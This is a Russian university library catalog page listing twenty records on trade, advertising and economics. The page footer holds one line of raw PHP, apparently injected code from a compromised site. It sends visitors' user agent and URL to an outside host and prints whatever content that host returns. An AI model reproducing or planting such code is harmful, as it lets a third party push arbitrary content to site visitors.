Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

47 пользователей


Зарегистрированных: 1 

Скудин Иван Борисович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ТОРГОВАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 655
1. 
Чармэссон, Генри. Торговая марка: как создать имя, которое принесет миллионы [Текст] / Г. Чармэссон; Л. Корпан, 1999. - 222 с.
2. 
Дойль, Питер. Менеджмент: стратегия и тактика [Текст] / П. Дойль; Т. Карасевич, Ю. Н. Каптуревский, 1999. - 559 с.
Держатели документа (Информация об экземплярах) 
3. 
Задания для практических занятий по курсу "Внешнеэкономическая деятельность предприятия" [Текст] : Для студентов специальностей 06.08.00 - "Экономика и упр. на предприятии", 06.11.00 - "Менеджмент" / Сост. Яковлева Е. В., 1999. - 40 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
4. 
Уэллс, Уильям. Реклама: теория и практика [Текст] : учебное пособие / У. Уэллс, Д. Бернет, С. Мориарти; М. Артюх, 1999. - 735 с.
Держатели документа (Информация об экземплярах) 
5. 
Дашков, Леонид Павлович. Коммерция и технология торговли [Текст] : Учеб. для вузов / Л. П. Дашков, В. К. Памбухчиянц, 1999. - 445 с.
Ключевые слова 
Коммерция -- Коммерческая деятельность -- Торговля -- Учебник и пособие -- Договор -- Оптовая продажа -- Биржевая торговля -- Биржа -- Торговая операция -- Аукцион -- Реклама -- Лизинг -- Франчайзинг -- Склад -- Тара -- Перевозка товара -- Розничная торговля -- Контроль -- Защита прав потребителей -- Товар -- Бизнес -- Магазин -- Интерьер магазина -- Обслуживание покупателей -- ТОРГОВЫЙ зал -- ОБОРУДОВАНИЕ ТОРГОВО - ТЕХНОЛОГИЧЕСКОЕ -- ИНТЕРЬЕР МАГАЗИНА -- ЗАЩИТА ПРАВ ПОТРЕБИТЕЛЕЙ -- ТОРГОВЛЯ - КОНТРОЛЬ ГОСУДАРС -- ПРАВИЛА ПРОДАЖИ ТОВАРА -- ПРАВИЛА РОЗНИЧНОЙ ТОРГОВЛИ -- машина контрольно-кассовая -- ПРАВИЛА САНИТАРНЫЕ -- УПРАВЛЕНИЕ ТОРГОВЫМ ПРОЦЕССОМ -- ПРОЕКТИРОВАНИЕ ПРЕДПРИЯТИЙ ТОРГОВЛИ -- СТРОИТЕЛЬСТВО КАПИТАЛЬНОЕ ТОРГОВЫХ ПРЕДПРИЯТИЙ -- СТРОИТЕЛЬСТВО ПРЕДПРИЯТИЙ ТОРГОВЫХ -- РЕМОНТ ТОРГОВЫХ ПРЕДПРИЯТИЙ
6. 
7. 
Феофанов, Олег Александрович. Реклама: новые технологии в России [Текст] : Учеб. пособие для подгот. профессионалов в сфере рекламы / О. А. Феофанов, 2000. - 376, [1] с.
8. 
Дашков, Леонид Павлович. Коммерция и технология торговли [Текст] : Учеб. для вузов / Л. П. Дашков, В. К. Памбухчиянц, 2000. - 442 с.
Ключевые слова 
Коммерция -- Коммерческая деятельность -- Торговля -- Учебник и пособие -- Договор -- Оптовая продажа -- Биржа -- Биржевая торговля -- Торговая операция -- Аукцион -- Реклама -- Лизинг -- Фрайчайзинг -- Склад -- Тара -- Перевозка товара -- Розничная торговля -- Контроль -- Защита прав потребителей -- Товар -- Бизнес -- Магазин -- ПРЕДПРИЯТИЕ розничное торговое -- МАГАЗИН -- ТОРГОВЫЙ зал -- ОБОРУДОВАНИЕ ТОРГОВО - ТЕХНОЛОГИЧЕСКОЕ -- ИНТЕРЬЕР МАГАЗИНА -- ЗАЩИТА ПРАВ ПОТРЕБИТЕЛЕЙ -- ТОРГОВЛЯ - КОНТРОЛЬ ГОСУДАРС -- ПРАВИЛА ПРОДАЖИ ТОВАРА -- ПРАВИЛА РОЗНИЧНОЙ ТОРГОВЛИ -- машина контрольно-кассовая -- ПРАВИЛА САНИТАРНЫЕ -- УПРАВЛЕНИЕ ТОРГОВЫМ ПРОЦЕССОМ -- ПРОЕКТИРОВАНИЕ ПРЕДПРИЯТИЙ ТОРГОВЛИ -- СТРОИТЕЛЬСТВО КАПИТАЛЬНОЕ ТОРГОВЫХ ПРЕДПРИЯТИЙ -- СТРОИТЕЛЬСТВО ПРЕДПРИЯТИЙ ТОРГОВЫХ -- РЕМОНТ ТОРГОВЫХ ПРЕДПРИЯТИЙ
9. 
Эдвардс, Чарлз. Реклама в розничной торговле США [Текст] : Практ. пособие: Сокр. пер. с англ. / Ч. Эдвардс, Р. Браун, 1992. - 271 с.
Держатели документа (Информация об экземплярах) 
10. 
Батра, Раджив. Рекламный менеджмент [Текст] : Пер. с англ. / Р. Батра, Д. Дж. Майерс, Д. А. Аакер, 1999. - 780 с.
11. 
Олвуд, Джон. Выставки: планирование и дизайн [Текст] : Рук. для деловых людей, дизайнеров, устроителей и участников выст.: Пер. с англ. / Д. Олвуд, Б. Монтгомери, 1991. - 154 с.
Держатели документа (Информация об экземплярах) 
12. 
Хопкинс, Том. Искусство торговать [Текст] / Т. Хопкинс, 1996. - 248 с.
Держатели документа (Информация об экземплярах) 
13. 
Фатрелл, Чарльз. Основы торговли [Текст] / Ч. Фатрелл, 1995. - 698 с.
14. 
Тяжких, Д. С.Типичные ошибки, допускаемые при отражении финансово-хозяйственной деятельности в бухгалтерском учете. Рекомендации по их устранению [Текст] : Для рук. и бухгалтеров. Т. 2, 1997. - 440 с.
Держатели документа (Информация об экземплярах) 
15. 
Рэпп, Стэн. Новый максимаркетинг [Текст] / С. Рэпп, Л. Коллинз; Т. А. Лащенко, 1997. - 536 с.
Держатели документа (Информация об экземплярах) 
16. 
Стюарт, Грант. Успешный менеджмент торговли [Текст] : Как сделать Вашу команду самой лучшей / Г. Стюарт; Л. А. Мороз, 1997. - 184 с.
Держатели документа (Информация об экземплярах) 
17. 
Стюарт, Грант. Успешный менеджмент торговли [Текст] : Как сделать Вашу команду самой лучшей / Г. Стюарт; Л. А. Мороз, 1996. - 184 с.
Держатели документа (Информация об экземплярах) 
18. 
Яковлева, Елена Владимировна. Внешнеэкономическая деятельность предприятий [Текст] : учеб. пособие / Е. В. Яковлева, 1998. - 93 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

Раскрывается содержание понятия “внешнеэкономическая деятельность” при-менительно к российским условиям хозяйствования. Рассмотрены тенденции развития взаимоотношений между странами, определяющими сущность системы мирового хозяйства. Приводятся современные методы организации внешнеэкономической деятельности предприятий, формы и методы работы на внешних рынках.

Учебное пособие предназначено для студентов специальностей 06.08.00 - “Экономика и управление на предприятии”, 06.11.00 - “Менеджмент”

Полный текст
19. 
Экономическая теория [Текст] : Учеб. для вузов / В. Д. Камаев, М. А. Абрамова, Л. С. Александрова, 1998. - 636 с.
Ключевые слова 
Экономическая теория -- Учебник -- Экономика -- Рыночная экономика -- Микроэкономика -- Макроэкономика -- Спрос -- Премия Нобеля - экономика -- Золотой стандарт -- Экономика плановая -- Экономика переходная -- Цена -- ПОВЕДЕНИЕ Потребительское -- Издержки производства -- Ценообразование -- Конкуренция -- Олигополия -- Прибыль -- ДОХОД -- ПРЕДПРИНИМАТЕЛЬСТВО -- Предприятие -- Счет национальный -- Спрос совокупный -- Деньги -- КРЕДИТ -- система банковская -- Монетаризм -- теория денег кейнсианская -- Политика денежно-кредитная -- Политика финансовая -- НАЛОГООБЛОЖЕНИЕ -- БЮДЖЕТ -- ФИНАНСЫ -- Инфляция -- Политика антиинфляционная -- Политика экономическая
Оглавление 
  • Основные понятия экономической теории. Микроэкономика. Макроэкономика. Международные экономические отношения.
20. 
Реклама и содействие продаже [Текст] : Для студентов эконом. специальностей вузов: Пер. с англ., 1994. - 51 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3025 - 21.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.50 с.12 запросов, 0.75c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;